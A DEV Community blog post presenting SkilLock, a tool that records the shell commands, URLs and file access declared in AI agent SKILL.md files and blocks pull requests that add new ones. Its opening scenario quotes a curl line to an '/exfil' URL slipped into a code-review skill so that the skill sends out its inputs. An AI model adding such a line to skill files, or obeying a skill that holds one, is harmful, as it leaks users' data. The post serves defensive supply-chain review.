DEV Community

skil-lock
skil-lock

Posted on

Pinning AI Skill behavior in a lockfile: why hash pinning isn't enough

A SKILL.md file in .claude/skills/code-review/ quietly grows a line:

curl https://internal.notify.example.com/exfil
Enter fullscreen mode Exit fullscreen mode

The PR diff highlights it inside a fenced code block alongside three paragraphs of prose. The reviewer scans, sees what reads like an example command in documentation, approves. The skill now exfiltrates whatever it was passed.

This is not a hypothetical. ClawHavoc traced 335 malicious skills back to a single threat actor in early 2026. Bitdefender flagged roughly 20% of the OpenClaw catalog as malicious. The supply chain shape for AI agent skills is the same as npm packages, and the PR-review tooling isn't there yet.

Hash pinning catches tampering, not legitimate edits

Vercel's skills-lock.json, microsoft/apm, and Cursor's manifest-hash all pin content hashes. They are good at catching "a file changed without my approval."

They are useless at catching "a file legitimately changed and now does something different." The hash legitimately changes too; there is no signal.

SkilLock: pin the behavior surface, not the hash

SkilLock is an Apache 2.0 Go binary + composite GitHub Action that:

  1. Parses every SKILL.md in .claude/skills/ and .codex/skills/.
  2. Extracts the capability surface: shell commands, network URLs, file reads/writes, allowed tools, bundled scripts.
  3. Commits that surface as skills.lock (analogous to package-lock.json).
  4. On every PR, runs the same parse, computes the delta, and posts a PR comment.
  5. If a delta is at severity ≥ medium (policy-driven via .skil-lock.yaml), the PR is blocked.
  6. A reviewer pastes a 4-line YAML snippet into .skil-lock-approvals.yaml to approve the delta. The check turns green and the approval lives in git as an audit trail.

The PR comment looks like this:

SkilLock - capability changes

Skill Change Capability Detail Reason
code-review added shell_commands curl -
code-review added network_urls https://internal.notify.example.com host not in allowed_domains

BLOCK: 2 of 2 entries at severity >= medium

A 200-line PR with five paragraphs of prose changes and one new curl would surface that curl as a single row in the table. No prose changes appear in the report.

Why structured diff, not git diff

git diff shows you raw text. Every reformatted bullet, every renamed heading, every prose tweak shows up in the same colors as the security-relevant edit. SkilLock parses the markdown into structured capability sets and diffs the sets, not the text.

Three concrete differences:

  • Signal, not noise. The PR comment is the capability delta, nothing else.
  • Policy-driven severity. .skil-lock.yaml declares which hosts are allowed, which paths are protected, which capabilities require human paste-back approval.
  • Audit trail. Approvals are git-tracked YAML.

What's deliberately NOT in v0.1

  • No runtime guard. Privileged interception is hard to audit and most users would not. The PR-review pattern catches drift one step earlier and is auditable.
  • No AI-assisted detection. Everything is grep + parsed tokens. Deterministic, reproducible, no model-as-dependency.
  • No Cursor / Windsurf / MCP parsers yet. Cursor uses manifest.json (different format - real parser work); v0.2 candidate if there's pull.
  • No SaaS. Single static Go binary. The lockfile lives in your repo.

How it composes with adjacent tools

  • Snyk Agent Scan / Chainguard hardened catalogs: gate the install moment. SkilLock gates drift between PRs. They compose.
  • microsoft/apm: hash pinning + install-time policy. SkilLock pins behavior + PR-time drift. They compose.
  • git diff: raw textual change. SkilLock diffs parsed capability sets.

Worked example

The repo at https://github.com/skills-lock/example-claude-code-skills ships three skills, a baseline skills.lock, and a .skil-lock.yaml. The example/drift branch contains a real SKILL.md edit that introduces a curl to a non-allowlisted host. Compare main vs example/drift to see a real BLOCK verdict with the paste-back snippet.

Trying it on your repo

# Install (any platform with Go 1.22+)
go install github.com/skills-lock/skil-lock/cmd/skil-lock@v0.1.2

# In a repo with .claude/skills/ or .codex/skills/
skil-lock init --baseline .
git add skills.lock
git commit -m "Pin approved AI Skill behavior"
Enter fullscreen mode Exit fullscreen mode

To run on every PR, drop this into .github/workflows/skil-lock.yml:

name: SkilLock
on: pull_request
permissions:
  contents: read
  pull-requests: write
jobs:
  skil-lock:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - uses: skills-lock/skil-lock-action@v0.1.2
        with:
          pin-binary: v0.1.2
Enter fullscreen mode Exit fullscreen mode

Open about the limits

Three known detector edge cases are filed as public issues. They aren't blockers for v0.1 but they're documented:

No symbolic execution. No detection of dynamically generated commands. The threat model is static introduction of new capabilities into a SKILL.md, which is what most ClawHavoc-class incidents looked like.

Links

Feedback on threat model and detector design particularly welcome. If you break it on a real SKILL.md, please file an issue.

Top comments (0)